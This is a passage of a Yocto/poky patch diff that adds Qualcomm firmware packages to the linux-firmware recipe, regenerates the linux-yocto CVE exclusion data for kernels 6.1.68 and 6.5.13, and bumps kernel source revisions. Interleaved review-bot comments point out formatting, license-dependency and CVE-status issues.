LICENSE:${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "Firmware-qcom"
LICENSE:${PN}-qcom-sc8280xp-lenovo-x13s-compute = "Firmware-qcom"
@@ -1105,6 +1345,7 @@ LICENSE:${PN}-qcom-sdm845-thundercomm-db845c-sensors = "Firmware-qcom"
LICENSE:${PN}-qcom-sm8250-audio = "Firmware-qcom"
LICENSE:${PN}-qcom-sm8250-adreno = "Firmware-qcom"
LICENSE:${PN}-qcom-sm8250-compute = "Firmware-qcom"
+LICENSE:${PN}-qcom-sm8250-thundercomm-rb5-sensors = "Firmware-qcom"
FILES:${PN}-qcom-license = "${nonarch_base_libdir}/firmware/LICENSE.qcom ${nonarch_base_libdir}/firmware/qcom/NOTICE.txt"
FILES:${PN}-qcom-yamato-license = "${nonarch_base_libdir}/firmware/LICENSE.qcom_yamato"
@@ -1112,6 +1353,7 @@ FILES:${PN}-qcom-venus-1.8 = "${nonarch_base_libdir}/firmware/qcom/venus-1.8/*"
FILES:${PN}-qcom-venus-4.2 = "${nonarch_base_libdir}/firmware/qcom/venus-4.2/*"
FILES:${PN}-qcom-venus-5.2 = "${nonarch_base_libdir}/firmware/qcom/venus-5.2/*"
FILES:${PN}-qcom-venus-5.4 = "${nonarch_base_libdir}/firmware/qcom/venus-5.4/*"
+FILES:${PN}-qcom-venus-6.0 = "${nonarch_base_libdir}/firmware/qcom/venus-6.0/*"
FILES:${PN}-qcom-vpu-1.0 = "${nonarch_base_libdir}/firmware/qcom/vpu-1.0/*"
FILES:${PN}-qcom-vpu-2.0 = "${nonarch_base_libdir}/firmware/qcom/vpu-2.0/*"
FILES:${PN}-qcom-adreno-a2xx = "${nonarch_base_libdir}/firmware/qcom/leia_*.fw ${nonarch_base_libdir}/firmware/qcom/yamato_*.fw"
@@ -1121,29 +1363,41 @@ FILES:${PN}-qcom-adreno-a530 = "${nonarch_base_libdir}/firmware/qcom/a530*.fw*"
FILES:${PN}-qcom-adreno-a630 = "${nonarch_base_libdir}/firmware/qcom/a630*.*"
FILES:${PN}-qcom-adreno-a650 = "${nonarch_base_libdir}/firmware/qcom/a650*.*"
FILES:${PN}-qcom-adreno-a660 = "${nonarch_base_libdir}/firmware/qcom/a660*.*"
+FILES:${PN}-qcom-adreno-a702 = "${nonarch_base_libdir}/firmware/qcom/a702*.*"
FILES:${PN}-qcom-apq8016-modem = "${nonarch_base_libdir}/firmware/qcom/apq8016/mba.mbn ${nonarch_base_libdir}/firmware/qcom/apq8016/modem.mbn"
FILES:${PN}-qcom-apq8016-wifi = "${nonarch_base_libdir}/firmware/qcom/apq8016/wcnss.mbn ${nonarch_base_libdir}/firmware/qcom/apq8016/WCNSS*"
FILES:${PN}-qcom-apq8096-adreno = "${nonarch_base_libdir}/firmware/qcom/apq8096/a530_zap.mbn ${nonarch_base_libdir}/firmware/qcom/a530_zap.mdt"
FILES:${PN}-qcom-apq8096-audio = "${nonarch_base_libdir}/firmware/qcom/apq8096/adsp*.*"
FILES:${PN}-qcom-apq8096-modem = "${nonarch_base_libdir}/firmware/qcom/apq8096/mba.mbn ${nonarch_base_libdir}/firmware/qcom/apq8096/modem*.* ${nonarch_base_libdir}/firmware/qcom/apq8096/wlanmdsp.mbn"
+FILES:${PN}-qcom-qcm2290-adreno = "${nonarch_base_libdir}/firmware/qcom/qcm2290/a702_zap.mbn"
+FILES:${PN}-qcom-qcm2290-audio = "${nonarch_base_libdir}/firmware/qcom/qcm2290/adsp*.*"
+FILES:${PN}-qcom-qcm2290-modem = "${nonarch_base_libdir}/firmware/qcom/qcm2290/modem*.*"
+FILES:${PN}-qcom-qcm2290-wifi = "${nonarch_base_libdir}/firmware/qcom/qcm2290/wlanmdsp.mbn"
+FILES:${PN}-qcom-qrb4210-adreno = "${nonarch_base_libdir}/firmware/qcom/qrb4210/a610_zap.mbn"
+FILES:${PN}-qcom-qrb4210-audio = "${nonarch_base_libdir}/firmware/qcom/qrb4210/adsp*.*"
+FILES:${PN}-qcom-qrb4210-compute = "${nonarch_base_libdir}/firmware/qcom/qrb4210/cdsp*.*"
+FILES:${PN}-qcom-qrb4210-modem = "${nonarch_base_libdir}/firmware/qcom/qrb4210/modem*.*"
+FILES:${PN}-qcom-qrb4210-wifi = "${nonarch_base_libdir}/firmware/qcom/qrb4210/wlanmdsp.mbn"
FILES:${PN}-qcom-sc8280xp-lenovo-x13s-compat = "${nonarch_base_libdir}/firmware/qcom/LENOVO/21BX"
-FILES:${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*adsp*.* ${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/battmgr.jsn ${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/audioreach-tplg.bin"
+FILES:${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*adsp*.* ${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/battmgr.jsn ${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/audioreach-tplg.bin ${nonarch_base_libdir}/firmware/qcom/sc8280xp/SC8280XP-LENOVO-X13S-tplg.bin"
FILES:${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/qcdxkmsuc8280.mbn"
FILES:${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*cdsp*.*"
FILES:${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*slpi*.*"
FILES:${PN}-qcom-sdm845-adreno = "${nonarch_base_libdir}/firmware/qcom/sdm845/a630*.*"
FILES:${PN}-qcom-sdm845-audio = "${nonarch_base_libdir}/firmware/qcom/sdm845/adsp*.*"
FILES:${PN}-qcom-sdm845-compute = "${nonarch_base_libdir}/firmware/qcom/sdm845/cdsp*.*"
-FILES:${PN}-qcom-sdm845-modem = "${nonarch_base_libdir}/firmware/qcom/sdm845/mba.mbn ${nonarch_base_libdir}/firmware/qcom/sdm845/modem*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/wlanmdsp.mbn"
+FILES:${PN}-qcom-sdm845-modem = "${nonarch_base_libdir}/firmware/qcom/sdm845/mba.mbn ${nonarch_base_libdir}/firmware/qcom/sdm845/modem*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/wlanmdsp.mbn ${nonarch_base_libdir}/firmware/qcom/sdm845/notice.txt_wlanmdsp"
FILES:${PN}-qcom-sdm845-thundercomm-db845c-sensors = "${nonarch_base_libdir}/firmware/qcom/sdm845/Thundercomm/db845c/slpi*.*"
FILES:${PN}-qcom-sm8250-adreno = "${nonarch_base_libdir}/firmware/qcom/sm8250/a650*.*"
FILES:${PN}-qcom-sm8250-audio = "${nonarch_base_libdir}/firmware/qcom/sm8250/adsp*.*"
FILES:${PN}-qcom-sm8250-compute = "${nonarch_base_libdir}/firmware/qcom/sm8250/cdsp*.*"
+FILES:${PN}-qcom-sm8250-thundercomm-rb5-sensors = "${nonarch_base_libdir}/firmware/qcom/sm8250/Thundercomm/RB5/slpi*.*"
RDEPENDS:${PN}-qcom-venus-1.8 = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-venus-4.2 = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-venus-5.2 = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-venus-5.4 = "${PN}-qcom-license"
+RDEPENDS:${PN}-qcom-venus-6.0 = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-vpu-1.0 = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-vpu-2.0 = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-adreno-a2xx = "${PN}-qcom-license ${PN}-qcom-yamato-license"
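Review bot: the changed `FILES:${PN}-qcom-sc8280xp-lenovo-x13s-audio` and `FILES:${PN}-qcom-sdm845-modem` assignments each put four paths on a single line, which makes the actual addition (`SC8280XP-LENOVO-X13S-tplg.bin`, `notice.txt_wlanmdsp`) hard to see in the diff. Splitting them one path per line with `\` continuations, as the reworked `FILES:${PN}-ice` in this same patch does, would keep later changes to these lists reviewable.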
@@ -1153,20 +1407,34 @@ RDEPENDS:${PN}-qcom-adreno-a530 = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-adreno-a630 = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-adreno-a650 = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-adreno-a660 = "${PN}-qcom-license"
+RDEPENDS:${PN}-qcom-adreno-a702 = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-apq8016-modem = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-apq8016-wifi = "${PN}-qcom-license"
+RDEPENDS:${PN}-qcom-apq8096-adreno = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-apq8096-audio = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-apq8096-modem = "${PN}-qcom-license"
+RDEPENDS:${PN}-qcom-qcm2290-adreno = "${PN}-qcom-license"
+RDEPENDS:${PN}-qcom-qcm2290-audio = "${PN}-qcom-license"
+RDEPENDS:${PN}-qcom-qcm2290-modem = "${PN}-qcom-license"
+RDEPENDS:${PN}-qcom-qcm2290-wifi = "${PN}-qcom-license"
+RDEPENDS:${PN}-qcom-qrb4210-adreno = "${PN}-qcom-license"
+RDEPENDS:${PN}-qcom-qrb4210-audio = "${PN}-qcom-license"
+RDEPENDS:${PN}-qcom-qrb4210-compute = "${PN}-qcom-license"
+RDEPENDS:${PN}-qcom-qrb4210-modem = "${PN}-qcom-license"
+RDEPENDS:${PN}-qcom-qrb4210-wifi = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${PN}-qcom-license"
+RDEPENDS:${PN}-qcom-sdm845-adreno = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-sdm845-audio = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-sdm845-compute = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-sdm845-modem = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-sdm845-thundercomm-db845c-sensors = "${PN}-qcom-license"
+RDEPENDS:${PN}-qcom-sm8250-adreno = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-sm8250-audio = "${PN}-qcom-license"
RDEPENDS:${PN}-qcom-sm8250-compute = "${PN}-qcom-license"
+RDEPENDS:${PN}-qcom-sm8250-thundercomm-rb5-sensors = "${PN}-qcom-license"
RRECOMMENDS:${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
RRECOMMENDS:${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
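Review bot: this hunk fills in missing `${PN}-qcom-license` dependencies, but `RDEPENDS:${PN}-qcom-sc8280xp-lenovo-x13s-audio` still lists only `${PN}-qcom-license` although the LICENSE line for that package earlier in the patch reads "Firmware-qcom & Firmware-linaro". If the recipe has a license package for Firmware-linaro, it should be added to this RDEPENDS in the same pass so the image carries both license texts.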
diff --git a/poky/meta/recipes-kernel/linux/cve-exclusion_6.1.inc b/poky/meta/recipes-kernel/linux/cve-exclusion_6.1.inc
index a8df51f321..1b51737c7d 100644
--- a/poky/meta/recipes-kernel/linux/cve-exclusion_6.1.inc
+++ b/poky/meta/recipes-kernel/linux/cve-exclusion_6.1.inc
@@ -1,9 +1,9 @@
# Auto-generated CVE metadata, DO NOT EDIT BY HAND.
-# Generated at 2023-11-03 13:24:16.070181+00:00 for version 6.1.57
+# Generated at 2023-12-23 08:44:42.304531+00:00 for version 6.1.68
python check_kernel_cve_status_version() {
- this_version = "6.1.57"
+ this_version = "6.1.68"
kernel_version = d.getVar("LINUX_VERSION")
if kernel_version != this_version:
bb.warn("Kernel CVE status needs updating: generated for %s but kernel is %s" % (this_version, kernel_version))
@@ -4524,7 +4524,7 @@ CVE_STATUS[CVE-2022-43945] = "fixed-version: Fixed from version 6.1rc1"
# CVE-2022-44033 needs backporting (fixed from 6.4rc1)
-# CVE-2022-44034 has no known resolution
+# CVE-2022-44034 needs backporting (fixed from 6.4rc1)
# CVE-2022-4543 has no known resolution
@@ -5016,6 +5016,10 @@ CVE_STATUS[CVE-2023-39193] = "cpe-stable-backport: Backported in 6.1.53"
CVE_STATUS[CVE-2023-39194] = "cpe-stable-backport: Backported in 6.1.47"
+CVE_STATUS[CVE-2023-39197] = "cpe-stable-backport: Backported in 6.1.39"
+
+CVE_STATUS[CVE-2023-39198] = "cpe-stable-backport: Backported in 6.1.47"
+
CVE_STATUS[CVE-2023-4004] = "cpe-stable-backport: Backported in 6.1.42"
# CVE-2023-4010 has no known resolution
@@ -5102,7 +5106,7 @@ CVE_STATUS[CVE-2023-4881] = "cpe-stable-backport: Backported in 6.1.54"
CVE_STATUS[CVE-2023-4921] = "cpe-stable-backport: Backported in 6.1.54"
-# CVE-2023-5090 needs backporting (fixed from 6.6rc7)
+CVE_STATUS[CVE-2023-5090] = "cpe-stable-backport: Backported in 6.1.62"
CVE_STATUS[CVE-2023-5158] = "cpe-stable-backport: Backported in 6.1.57"
@@ -5112,7 +5116,19 @@ CVE_STATUS[CVE-2023-5197] = "cpe-stable-backport: Backported in 6.1.56"
CVE_STATUS[CVE-2023-5345] = "cpe-stable-backport: Backported in 6.1.56"
-# CVE-2023-5633 needs backporting (fixed from 6.6rc6)
+CVE_STATUS[CVE-2023-5633] = "fixed-version: only affects 6.2 onwards"
# CVE-2023-5717 needs backporting (fixed from 6.1.60)
+# CVE-2023-5972 needs backporting (fixed from 6.6rc7)
+
+# CVE-2023-6039 needs backporting (fixed from 6.5rc5)
+
+CVE_STATUS[CVE-2023-6111] = "fixed-version: only affects 6.6rc3 onwards"
+
+CVE_STATUS[CVE-2023-6121] = "cpe-stable-backport: Backported in 6.1.65"
+
+CVE_STATUS[CVE-2023-6176] = "cpe-stable-backport: Backported in 6.1.54"
+
+# CVE-2023-6238 has no known resolution
+
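Review bot: the unchanged context line `# CVE-2023-5717 needs backporting (fixed from 6.1.60)` no longer agrees with the header, which now says the file was generated for 6.1.68, a later release than 6.1.60. Because it is a comment and not a `CVE_STATUS[...]` entry, cve-check will keep reporting the CVE against this kernel. The file is marked DO NOT EDIT BY HAND, so the correction belongs in the generator or its input data, followed by a regeneration. The same applies when reading the new comment-only entries (CVE-2023-5972, CVE-2023-6039): they document open items, they do not exclude anything.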
diff --git a/poky/meta/recipes-kernel/linux/cve-exclusion_6.5.inc b/poky/meta/recipes-kernel/linux/cve-exclusion_6.5.inc
index d48b0e1493..7711bcb4d6 100644
--- a/poky/meta/recipes-kernel/linux/cve-exclusion_6.5.inc
+++ b/poky/meta/recipes-kernel/linux/cve-exclusion_6.5.inc
@@ -1,9 +1,9 @@
# Auto-generated CVE metadata, DO NOT EDIT BY HAND.
-# Generated at 2023-11-03 13:24:25.010946+00:00 for version 6.5.7
+# Generated at 2023-12-18 14:15:23.952852+00:00 for version 6.5.13
python check_kernel_cve_status_version() {
- this_version = "6.5.7"
+ this_version = "6.5.13"
kernel_version = d.getVar("LINUX_VERSION")
if kernel_version != this_version:
bb.warn("Kernel CVE status needs updating: generated for %s but kernel is %s" % (this_version, kernel_version))
@@ -4524,7 +4524,7 @@ CVE_STATUS[CVE-2022-44032] = "fixed-version: Fixed from version 6.4rc1"
CVE_STATUS[CVE-2022-44033] = "fixed-version: Fixed from version 6.4rc1"
-# CVE-2022-44034 has no known resolution
+CVE_STATUS[CVE-2022-44034] = "fixed-version: Fixed from version 6.4rc1"
# CVE-2022-4543 has no known resolution
@@ -5016,6 +5016,10 @@ CVE_STATUS[CVE-2023-39191] = "fixed-version: Fixed from version 6.3rc1"
CVE_STATUS[CVE-2023-39194] = "fixed-version: Fixed from version 6.5rc7"
+CVE_STATUS[CVE-2023-39197] = "fixed-version: Fixed from version 6.5rc1"
+
+CVE_STATUS[CVE-2023-39198] = "fixed-version: Fixed from version 6.5rc7"
+
CVE_STATUS[CVE-2023-4004] = "fixed-version: Fixed from version 6.5rc3"
# CVE-2023-4010 has no known resolution
@@ -5116,3 +5120,15 @@ CVE_STATUS[CVE-2023-4732] = "fixed-version: Fixed from version 5.14rc1"
# CVE-2023-5717 needs backporting (fixed from 6.6rc7)
+CVE_STATUS[CVE-2023-5972] = "cpe-stable-backport: Backported in 6.5.9"
+
+CVE_STATUS[CVE-2023-6039] = "fixed-version: Fixed from version 6.5rc5"
+
+CVE_STATUS[CVE-2023-6111] = "fixed-version: only affects 6.6rc3 onwards"
+
+# CVE-2023-6121 needs backporting (fixed from 6.7rc3)
+
+CVE_STATUS[CVE-2023-6176] = "cpe-stable-backport: Backported in 6.5.4"
+
+# CVE-2023-6238 has no known resolution
+
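Review bot: CVE-2023-6121 is added here as `needs backporting (fixed from 6.7rc3)`, while the 6.1 file in this same commit records it as backported in 6.1.65. Per this data the 6.5.13 kernel remains affected, and the context line for CVE-2023-5717 (`fixed from 6.6rc7`) is in the same state. Since both are comments, not `CVE_STATUS` entries, they will show up as unpatched in cve-check output for builds using linux-yocto 6.5; worth calling out in the commit message so downstream users of the 6.5 recipe know these are known-open and not an omission.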
diff --git a/poky/meta/recipes-kernel/linux/linux-yocto-rt_6.1.bb b/poky/meta/recipes-kernel/linux/linux-yocto-rt_6.1.bb
index 0272a8a59e..5cfc5a7dd8 100644
--- a/poky/meta/recipes-kernel/linux/linux-yocto-rt_6.1.bb
+++ b/poky/meta/recipes-kernel/linux/linux-yocto-rt_6.1.bb
@@ -14,13 +14,13 @@ python () {
raise bb.parse.SkipRecipe("Set PREFERRED_PROVIDER_virtual/kernel to linux-yocto-rt to enable it")
}
-SRCREV_machine ?= "a3ae026c0673c043e1fd3374e488a78b29249534"
-SRCREV_meta ?= "8aa5efbc5e5361efc8b11c5aec9b967085613a0b"
+SRCREV_machine ?= "739b3001f20153a66d2723de81faae18cd61892b"
+SRCREV_meta ?= "991713c8765172cb5d18703d15589f3ec6e1b772"
SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;branch=${KBRANCH};name=machine;protocol=https \
git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-6.1;destsuffix=${KMETA};protocol=https"
-LINUX_VERSION ?= "6.1.57"
+LINUX_VERSION ?= "6.1.68"
LIC_FILES_CHKSUM = "file://COPYING;md5=6bc538ed5bd9a7fc9398086aedcd7e46"
diff --git a/poky/meta/recipes-kernel/linux/linux-yocto-rt_6.5.bb b/poky/meta/recipes-kernel/linux/linux-yocto-rt_6.5.bb
index 598280c5b6..0120b9ba63 100644
--- a/poky/meta/recipes-kernel/linux/linux-yocto-rt_6.5.bb
+++ b/poky/meta/recipes-kernel/linux/linux-yocto-rt_6.5.bb
@@ -14,13 +14,13 @@ python () {
raise bb.parse.SkipRecipe("Set PREFERRED_PROVIDER_virtual/kernel to linux-yocto-rt to enable it")
}
-SRCREV_machine ?= "2aa14dbb8520e59358778a80b32d7ccf6dd6c2ac"
-SRCREV_meta ?= "9af846da534077c91e3c42242fceba7aef8dd784"
+SRCREV_machine ?= "3ad8578bcc3186cde9b35de8c56afc0cba68bc55"
+SRCREV_meta ?= "3b1f87ec237ec3ad9acffb3d75c55efe958085dc"
SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;branch=${KBRANCH};name=machine;protocol=https \
git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-6.5;destsuffix=${KMETA};protocol=https"
-LINUX_VERSION ?= "6.5.7"
+LINUX_VERSION ?= "6.5.13"
LIC_FILES_CHKSUM = "file://COPYING;md5=6bc538ed5bd9a7fc9398086aedcd7e46"
diff --git a/poky/meta/recipes-kernel/linux/linux-yocto-tiny_6.1.bb b/poky/meta/recipes-kernel/linux/linux-yocto-tiny_6.1.bb
index b05f3107af..e19b0ec132 100644
--- a/poky/meta/recipes-kernel/linux/linux-yocto-tiny_6.1.bb
+++ b/poky/meta/recipes-kernel/linux/linux-yocto-tiny_6.1.bb
@@ -8,7 +8,7 @@ require recipes-kernel/linux/linux-yocto.inc
# CVE exclusions
include recipes-kernel/linux/cve-exclusion_6.1.inc
-LINUX_VERSION ?= "6.1.57"
+LINUX_VERSION ?= "6.1.68"
LIC_FILES_CHKSUM = "file://COPYING;md5=6bc538ed5bd9a7fc9398086aedcd7e46"
DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}"
@@ -17,8 +17,8 @@ DEPENDS += "openssl-native util-linux-native"
KMETA = "kernel-meta"
KCONF_BSP_AUDIT_LEVEL = "2"
-SRCREV_machine ?= "8a449d3428e673be0bdb504dadb666b4ad7208e3"
-SRCREV_meta ?= "8aa5efbc5e5361efc8b11c5aec9b967085613a0b"
+SRCREV_machine ?= "db1e71dc5c31557828fae0084b0f9cc83882eacd"
+SRCREV_meta ?= "991713c8765172cb5d18703d15589f3ec6e1b772"
PV = "${LINUX_VERSION}+git"
diff --git a/poky/meta/recipes-kernel/linux/linux-yocto-tiny_6.5.bb b/poky/meta/recipes-kernel/linux/linux-yocto-tiny_6.5.bb
index b047ab340b..cc24e3d346 100644
--- a/poky/meta/recipes-kernel/linux/linux-yocto-tiny_6.5.bb
+++ b/poky/meta/recipes-kernel/linux/linux-yocto-tiny_6.5.bb
@@ -8,7 +8,7 @@ require recipes-kernel/linux/linux-yocto.inc
# CVE exclusions
include recipes-kernel/linux/cve-exclusion_6.5.inc
-LINUX_VERSION ?= "6.5.7"
+LINUX_VERSION ?= "6.5.13"
LIC_FILES_CHKSUM = "file://COPYING;md5=6bc538ed5bd9a7fc9398086aedcd7e46"
DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}"
@@ -17,8 +17,8 @@ DEPENDS += "openssl-native util-linux-native"
KMETA = "kernel-meta"
KCONF_BSP_AUDIT_LEVEL = "2"
-SRCREV_machine ?= "dfe7f47645429e162819c3d5690d8f5052f5b5a3"
-SRCREV_meta ?= "9af846da534077c91e3c42242fceba7aef8dd784"
+SRCREV_machine ?= "fc3138c70652b48a0bf3620fd7aa861fa1f14e27"
+SRCREV_meta ?= "3b1f87ec237ec3ad9acffb3d75c55efe958085dc"
PV = "${LINUX_VERSION}+git"
diff --git a/poky/meta/recipes-kernel/linux/linux-yocto_6.1.bb b/poky/meta/recipes-kernel/linux/linux-yocto_6.1.bb
index 062fde84a4..1329ccc958 100644
--- a/poky/meta/recipes-kernel/linux/linux-yocto_6.1.bb
+++ b/poky/meta/recipes-kernel/linux/linux-yocto_6.1.bb
@@ -18,25 +18,25 @@ KBRANCH:qemux86-64 ?= "v6.1/standard/base"
KBRANCH:qemuloongarch64 ?= "v6.1/standard/base"
KBRANCH:qemumips64 ?= "v6.1/standard/mti-malta64"
-SRCREV_machine:qemuarm ?= "0ef61a389975a4019142c5f1e6608e6cc0a0df29"
-SRCREV_machine:qemuarm64 ?= "8a449d3428e673be0bdb504dadb666b4ad7208e3"
-SRCREV_machine:qemuloongarch64 ?= "8a449d3428e673be0bdb504dadb666b4ad7208e3"
-SRCREV_machine:qemumips ?= "d15ee28355bed16d59dd7d56259d2132e5c1c4ad"
-SRCREV_machine:qemuppc ?= "8a449d3428e673be0bdb504dadb666b4ad7208e3"
-SRCREV_machine:qemuriscv64 ?= "8a449d3428e673be0bdb504dadb666b4ad7208e3"
-SRCREV_machine:qemuriscv32 ?= "8a449d3428e673be0bdb504dadb666b4ad7208e3"
-SRCREV_machine:qemux86 ?= "8a449d3428e673be0bdb504dadb666b4ad7208e3"
-SRCREV_machine:qemux86-64 ?= "8a449d3428e673be0bdb504dadb666b4ad7208e3"
-SRCREV_machine:qemumips64 ?= "e740b68e38e55ca342ab3b70fa2f965c5a86758b"
-SRCREV_machine ?= "8a449d3428e673be0bdb504dadb666b4ad7208e3"
-SRCREV_meta ?= "8aa5efbc5e5361efc8b11c5aec9b967085613a0b"
+SRCREV_machine:qemuarm ?= "85915187700314cb7ac70fd33da3e9dfd7c20063"
+SRCREV_machine:qemuarm64 ?= "db1e71dc5c31557828fae0084b0f9cc83882eacd"
+SRCREV_machine:qemuloongarch64 ?= "db1e71dc5c31557828fae0084b0f9cc83882eacd"
+SRCREV_machine:qemumips ?= "24b06ee00fc3b65a24d7e867148b08a85296e67c"
+SRCREV_machine:qemuppc ?= "db1e71dc5c31557828fae0084b0f9cc83882eacd"
+SRCREV_machine:qemuriscv64 ?= "db1e71dc5c31557828fae0084b0f9cc83882eacd"
+SRCREV_machine:qemuriscv32 ?= "db1e71dc5c31557828fae0084b0f9cc83882eacd"
+SRCREV_machine:qemux86 ?= "db1e71dc5c31557828fae0084b0f9cc83882eacd"
+SRCREV_machine:qemux86-64 ?= "db1e71dc5c31557828fae0084b0f9cc83882eacd"
+SRCREV_machine:qemumips64 ?= "d4659a339611a02e4ffc2861e697c1a278707d70"
+SRCREV_machine ?= "db1e71dc5c31557828fae0084b0f9cc83882eacd"
+SRCREV_meta ?= "991713c8765172cb5d18703d15589f3ec6e1b772"
# set your preferred provider of linux-yocto to 'linux-yocto-upstream', and you'll
# get the <version>/base branch, which is pure upstream -stable, and the same
# meta SRCREV as the linux-yocto-standard builds. Select your version using the
# normal PREFERRED_VERSION settings.
BBCLASSEXTEND = "devupstream:target"
-SRCREV_machine:class-devupstream ?= "082280fe94a09462c727fb6e7b0c982efb36dede"
+SRCREV_machine:class-devupstream ?= "ba6f5fb465114fcd48ddb2c7a7740915b2289d6b"
PN:class-devupstream = "linux-yocto-upstream"
KBRANCH:class-devupstream = "v6.1/base"
@@ -45,7 +45,7 @@ SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;name=machine;branch=${KBRA
SRC_URI += "file://0001-perf-cpumap-Make-counter-as-unsigned-ints.patch"
LIC_FILES_CHKSUM = "file://COPYING;md5=6bc538ed5bd9a7fc9398086aedcd7e46"
-LINUX_VERSION ?= "6.1.57"
+LINUX_VERSION ?= "6.1.68"
PV = "${LINUX_VERSION}+git"
diff --git a/poky/meta/recipes-kernel/linux/linux-yocto_6.5.bb b/poky/meta/recipes-kernel/linux/linux-yocto_6.5.bb
index 516605c587..e7abc9784a 100644
--- a/poky/meta/recipes-kernel/linux/linux-yocto_6.5.bb
+++ b/poky/meta/recipes-kernel/linux/linux-yocto_6.5.bb
@@ -18,25 +18,25 @@ KBRANCH:qemux86-64 ?= "v6.5/standard/base"
KBRANCH:qemuloongarch64 ?= "v6.5/standard/base"
KBRANCH:qemumips64 ?= "v6.5/standard/mti-malta64"
-SRCREV_machine:qemuarm ?= "04942abac8568705f1fae34066db171b6e2669bd"
-SRCREV_machine:qemuarm64 ?= "ea4b620f18f882b3d882a53ffa33d8125ab27c83"
-SRCREV_machine:qemuloongarch64 ?= "14f83e40930806c3f5c61988e69a3ca1820a1b8f"
-SRCREV_machine:qemumips ?= "3348b580e3c47da56ce97a8297a574c2e37bc410"
-SRCREV_machine:qemuppc ?= "2fd47e07960edcd21455548ac6a25b19babe5c10"
-SRCREV_machine:qemuriscv64 ?= "14f83e40930806c3f5c61988e69a3ca1820a1b8f"
-SRCREV_machine:qemuriscv32 ?= "14f83e40930806c3f5c61988e69a3ca1820a1b8f"
-SRCREV_machine:qemux86 ?= "14f83e40930806c3f5c61988e69a3ca1820a1b8f"
-SRCREV_machine:qemux86-64 ?= "14f83e40930806c3f5c61988e69a3ca1820a1b8f"
-SRCREV_machine:qemumips64 ?= "6706327d870a0f246df8ed20c6a7f51ef46db1d6"
-SRCREV_machine ?= "14f83e40930806c3f5c61988e69a3ca1820a1b8f"
-SRCREV_meta ?= "9af846da534077c91e3c42242fceba7aef8dd784"
+SRCREV_machine:qemuarm ?= "07ca2c1cc013343f9a47b5ac4f37ed60f66fd73b"
+SRCREV_machine:qemuarm64 ?= "7af45f35fdcc82bbff07fa3d031620d5f5728b6b"
+SRCREV_machine:qemuloongarch64 ?= "e53dc7514de7d2fbe0f80547a50c0542928e2d11"
+SRCREV_machine:qemumips ?= "e0b08aab2ccc4257f0b34e7dcb1e054ea188a43d"
+SRCREV_machine:qemuppc ?= "9e609ca17604c708fdc6e7e5c9355bb2c5b73bcd"
+SRCREV_machine:qemuriscv64 ?= "e53dc7514de7d2fbe0f80547a50c0542928e2d11"
+SRCREV_machine:qemuriscv32 ?= "e53dc7514de7d2fbe0f80547a50c0542928e2d11"
+SRCREV_machine:qemux86 ?= "e53dc7514de7d2fbe0f80547a50c0542928e2d11"
+SRCREV_machine:qemux86-64 ?= "e53dc7514de7d2fbe0f80547a50c0542928e2d11"
+SRCREV_machine:qemumips64 ?= "58ffd9a4a907262daaedd9aca1e95e65d9716de3"
+SRCREV_machine ?= "e53dc7514de7d2fbe0f80547a50c0542928e2d11"
+SRCREV_meta ?= "3b1f87ec237ec3ad9acffb3d75c55efe958085dc"
# set your preferred provider of linux-yocto to 'linux-yocto-upstream', and you'll
# get the <version>/base branch, which is pure upstream -stable, and the same
# meta SRCREV as the linux-yocto-standard builds. Select your version using the
# normal PREFERRED_VERSION settings.
BBCLASSEXTEND = "devupstream:target"
-SRCREV_machine:class-devupstream ?= "121c6addffd71815cbd333baf409be682e2e148f"
